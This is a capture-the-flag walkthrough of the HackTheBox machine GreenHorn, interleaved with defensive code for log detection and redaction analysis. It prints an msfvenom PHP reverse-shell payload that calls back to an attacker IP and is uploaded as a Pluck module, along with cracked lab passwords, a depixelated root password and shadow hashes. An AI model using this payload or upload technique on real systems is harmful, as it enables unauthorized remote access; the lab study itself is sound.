Basic information

Port scan

22, 80 and 3000:

$ nmap -sC -sV 10.10.11.25
Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-22 13:18 CST
Nmap scan report for 10.10.11.25
Host is up (0.084s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_ 256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://greenhorn.htb/
3000/tcp open http Golang net/http server
|_http-title: GreenHorn
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=ee699bcc2d0bb37e; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=BH-kKD9O3wOBao4BBBGjWM97jK06MTcyMTYyNTA0NTkyOTQ4NzM0Mg; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 22 Jul 2024 05:10:45 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>GreenHorn</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=1571841bebfea9ad; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=gO4Es5cWdtazkF8-MtO-k-q8t6Y6MTcyMTYyNTA0NjMwNDYxMDI5MQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 22 Jul 2024 05:10:46 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=7/22%Time=669DEBBD%P=x86_64-apple-darwin23.4.
SF:0%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(GetRequest,2A60,"HTTP/1\.0\x20200\x20OK\r\nCache-Co
SF:ntrol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_
SF:gitea=ee699bcc2d0bb37e;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-
SF:Cookie:\x20_csrf=BH-kKD9O3wOBao4BBBGjWM97jK06MTcyMTYyNTA0NTkyOTQ4NzM0Mg
SF:;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-
SF:Options:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2022\x20Jul\x202024\x2005:10:4
SF:5\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"
SF:theme-auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=
SF:device-width,\x20initial-scale=1\">\n\t<title>GreenHorn</title>\n\t<lin
SF:k\x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIj
SF:oiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0d
SF:HA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVl
SF:bmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmc
SF:iLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMD
SF:AvYX")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Method\x20Not\x20
SF:Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Control:\x20max-age
SF:=0,\x20private,\x20must-revalidate,\x20no-transform\r\nSet-Cookie:\x20i
SF:_like_gitea=1571841bebfea9ad;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r
SF:\nSet-Cookie:\x20_csrf=gO4Es5cWdtazkF8-MtO-k-q8t6Y6MTcyMTYyNTA0NjMwNDYx
SF:MDI5MQ;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-
SF:Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2022\x20Jul\x202024\x200
SF:5:10:46\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP
SF:/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20chars
SF:et=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.65 seconds
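As an added example (my code, not part of the original writeup), a small Python parser for the nmap normal output above. It pulls out the open ports with their versions, the hostname nmap reported in the unfollowed redirect on port 80 (the reason a hosts entry is needed in the next step), and the port whose banner carries the Gitea session cookie. The sample input is an excerpt constructed from the scan above; the regexes assume nmap's default output layout (a `PORT STATE SERVICE VERSION` table with script lines prefixed by `|` or `|_`).

```python
import re

# Constructed excerpt of the nmap normal output shown above (not the full scan).
SAMPLE_NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://greenhorn.htb/
3000/tcp open http Golang net/http server
|_http-title: GreenHorn
| fingerprint-strings:
| GetRequest:
| Set-Cookie: i_like_gitea=ee699bcc2d0bb37e; Path=/; HttpOnly; SameSite=Lax
"""

# "22/tcp open ssh OpenSSH 8.9p1 ..." -> port, proto, state, service, free-form version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE script output lines: "| ..." or "|_ ..."
SCRIPT_LINE = re.compile(r"^\|_?\s*(.*)$")
REDIRECT = re.compile(r"Did not follow redirect to https?://([^/\s]+)")


def parse_nmap(text):
    """Return one record per port line, with the script lines that follow it attached."""
    ports = []
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_LINE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "scripts": [],
            })
            continue
        m = SCRIPT_LINE.match(line)
        if m and ports:
            ports[-1]["scripts"].append(m.group(1).strip())
    return ports


def open_ports(ports):
    return sorted(p["port"] for p in ports if p["state"] == "open")


def redirect_hosts(ports):
    """Hostnames that http-title reports as unfollowed redirects (virtual hosts to resolve)."""
    hosts = []
    for p in ports:
        for s in p["scripts"]:
            m = REDIRECT.search(s)
            if m and m.group(1) not in hosts:
                hosts.append(m.group(1))
    return hosts


def hosts_entries(ip, ports):
    """/etc/hosts lines for the virtual hosts the scan revealed."""
    return [f"{ip} {h}" for h in redirect_hosts(ports)]


def gitea_ports(ports):
    """Ports whose banner sets the Gitea session cookie: a self-hosted git service to inventory."""
    return [p["port"] for p in ports if any("i_like_gitea=" in s for s in p["scripts"])]


if __name__ == "__main__":
    parsed = parse_nmap(SAMPLE_NMAP_OUTPUT)
    print("open ports:", open_ports(parsed))
    print("hosts entries:", hosts_entries("10.10.11.25", parsed))
    print("gitea on:", gitea_ports(parsed))
```

Run it as-is, or replace `SAMPLE_NMAP_OUTPUT` with the contents of a `-oN` file; the `hosts_entries` output is exactly the line added to `/etc/hosts` in the next step.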

80

A hosts entry is needed; the site is Pluck:

10.10.11.25 greenhorn.htb

3000

It is Gitea, with one publicly accessible repo:

GreenHorn

The hash obtained from pass.php can be cracked:

d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163

iloveyou1

The password logs in to Pluck:

pluck

The Pluck part appeared before in Mist:

msfvenom -p php/meterpreter_reverse_tcp -f raw LHOST=10.10.14.12 LPORT=4444 -o miao.php

zip miao.zip miao.php

options -> manage modules -> install a module

http://greenhorn.htb/data/modules/miao/miao.php

This gives www-data:

user flag
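From the defender's side, as an added example that is not part of the writeup: detection logic over nginx access logs for the module-install path used above. A Pluck module is never meant to be requested directly as a URL, so a 200 for a `.php` file under `/data/modules/` (the path shown above) is worth an alert on its own, and a module install followed within minutes by such a request from the same client is stronger still. The log lines are constructed, and the `admin.php?action=installmodule` request path is my assumption about Pluck's admin interface, not something the writeup shows.

```python
import re
from datetime import datetime, timedelta

# nginx combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not a real capture from the box).
SAMPLE_LOG = """\
10.10.14.12 - - [22/Jul/2024:13:40:01 +0800] "GET /login.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
10.10.14.12 - - [22/Jul/2024:13:40:05 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.12 - - [22/Jul/2024:13:41:10 +0800] "POST /admin.php?action=installmodule HTTP/1.1" 200 1533 "-" "Mozilla/5.0"
10.10.14.12 - - [22/Jul/2024:13:41:30 +0800] "GET /data/modules/miao/miao.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.33 - - [22/Jul/2024:13:50:00 +0800] "GET /data/modules/contactform/contactform.php HTTP/1.1" 404 162 "-" "curl/8.0"
10.10.14.40 - - [22/Jul/2024:14:00:00 +0800] "GET /index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Direct request for a PHP file inside a module directory (from the writeup's URL shape).
MODULE_PHP = re.compile(r"^/data/modules/([^/?]+)/[^/?]+\.php")
# Assumed admin action for installing a module (hypothetical, see lead-in).
INSTALL_MARKER = "action=installmodule"


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
        d["status"] = int(d["status"])
        events.append(d)
    return events


def direct_module_php_requests(events):
    """Successful direct execution of a PHP file under data/modules/: (ip, module, path)."""
    hits = []
    for e in events:
        m = MODULE_PHP.match(e["path"])
        if m and e["status"] == 200:
            hits.append((e["ip"], m.group(1), e["path"]))
    return hits


def install_then_execute(events, window=timedelta(minutes=10)):
    """Same client installs a module and then directly requests a module PHP within `window`."""
    alerts = []
    installs = [e for e in events if e["method"] == "POST" and INSTALL_MARKER in e["path"]]
    for inst in installs:
        for e in events:
            m = MODULE_PHP.match(e["path"])
            if m and e["ip"] == inst["ip"] and inst["ts"] <= e["ts"] <= inst["ts"] + window:
                alerts.append({"ip": e["ip"], "module": m.group(1),
                               "installed_at": inst["ts"], "executed_at": e["ts"]})
    return alerts


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("direct module PHP hits:", direct_module_php_requests(evs))
    for a in install_then_execute(evs):
        print("ALERT install->execute:", a)
```

The mitigation that removes the whole class is to deny PHP execution under `/data/` at the web server (an nginx `location` matching `^/data/.*\.php$` that returns 403) and to keep the admin interface behind a separately authenticated path; the detection above then catches attempts as 403s rather than 200s.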

Basic password reuse. Looking at the user directories, junior reused the Pluck password:

su junior
iloveyou1

Then write in a public key to make the later steps easier.

Privilege escalation information

A PDF can be seen in junior's directory; download it and take a look:

scp junior@10.10.11.25:/home/junior/'Using OpenVAS.pdf' .

The PDF mentions that OpenVAS was installed to be run with sudo, and the password is pixelated:

So if the mosaic can be removed, the password can be obtained.

Depix

This can be used to recover the pixelated password.

The result is still somewhat blurry, but it is enough to make out the characters.

# extract the pixelated password region from the pdf as png
sudo apt-get install poppler-utils
pdfimages -j Using\ OpenVAS.pdf output_prefix
mogrify -format png output_prefix-000.ppm

# depix
python3 depix.py -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -p ../output_prefix-000.png

side from side the other side side from side the other side

(The mosaic in the middle was added by me.)
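Why pixelation is recoverable at all, as an added toy example (my code, not Depix, and not part of the original writeup). A mosaic replaces each block with the average of the pixels underneath, which is a deterministic function of those pixels: if the font and the block grid are known, every pixelated glyph maps back to a character by table lookup. The 5x5 glyphs, the 1-pixel gap and the block grid aligned to glyph boundaries are constructed simplifications; Depix does the same matching against a De Bruijn sequence rendered in the same editor and additionally searches over grid offsets. The block also shows the correct redaction, a solid fill, under which every glyph produces the same output and nothing can be recovered.

```python
# Tiny constructed 5x5 bitmap glyphs (1 = ink); not a real font.
GLYPHS = {
    "s": ["01111", "10000", "01110", "00001", "11110"],
    "i": ["00100", "00000", "00100", "00100", "00100"],
    "d": ["00001", "00001", "01111", "10001", "01111"],
    "e": ["01110", "10001", "11111", "10000", "01110"],
}
GLYPH_H = 5
GLYPH_W = 6  # 5 pixels of glyph plus a 1-pixel gap


def render(text):
    """Render text as rows of 0/1 ints, glyphs side by side with a 1-pixel gap."""
    rows = [[] for _ in range(GLYPH_H)]
    for ch in text:
        g = GLYPHS[ch]
        for r in range(GLYPH_H):
            rows[r].extend(int(c) for c in g[r])
            rows[r].append(0)
    return rows


def pixelate(img, block):
    """Mosaic filter: each block x block cell becomes its mean intensity, as image editors do."""
    h, w = len(img), len(img[0])
    out = []
    for y in range(0, h, block):
        row = []
        for x in range(0, w, block):
            cells = [img[yy][xx] for yy in range(y, min(y + block, h))
                     for xx in range(x, min(x + block, w))]
            row.append(round(sum(cells) / len(cells), 3))
        out.append(row)
    return out


def solid_redact(img, block):
    """Proper redaction: paint the region solid, then downsample to the same grid as pixelate()."""
    return pixelate([[1] * len(img[0]) for _ in img], block)


def pattern_table(redact, block):
    """Map each redacted single-glyph pattern to the characters that produce it."""
    table = {}
    for ch in GLYPHS:
        key = tuple(map(tuple, redact(render(ch), block)))
        table.setdefault(key, []).append(ch)
    return table


def distinct_patterns(redact, block):
    """How many different outputs the redaction leaves for the glyph set (1 = nothing leaks)."""
    return len(pattern_table(redact, block))


def recover(redacted, block, redact=pixelate):
    """Look each glyph-wide slice of the redacted image up in the pattern table; '?' if ambiguous."""
    table = pattern_table(redact, block)
    cols = GLYPH_W // block  # block columns per glyph (grid assumed aligned to glyphs)
    count = len(redacted[0]) // cols
    out = []
    for i in range(count):
        seg = tuple(tuple(row[i * cols:(i + 1) * cols]) for row in redacted)
        cands = table.get(seg, [])
        out.append(cands[0] if len(cands) == 1 else "?")
    return "".join(out)


if __name__ == "__main__":
    secret = render("side")
    print("pixelated  ->", recover(pixelate(secret, 2), 2))
    print("solid fill ->", recover(solid_redact(secret, 2), 2, solid_redact))
    print("patterns left: mosaic", distinct_patterns(pixelate, 2),
          "solid", distinct_patterns(solid_redact, 2))
```

The `distinct_patterns` count is the useful check when reviewing a redaction: a mosaic keeps one pattern per character (4 here, the whole alphabet of the toy), a solid fill collapses them to one.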

root flag

Removing the spaces from the recovered characters gives the root password:

sidefromsidetheothersidesidefromsidetheotherside

shadow

root:$y$j9T$NSPhYbBCBMhifcNXubO4U0$KgghRp5OmEotPgUh6e0/Qcyl4dKNs7Q/Xo7bmXFe6//:19885:0:99999:7:::
junior:$y$j9T$4CuWc/4J0pSo/Ku4w039e.$VUAimmgaEYnbEZpMrwpNnaaLmm.fQaKGCtWux8McYpD:19891:0:99999:7:::

References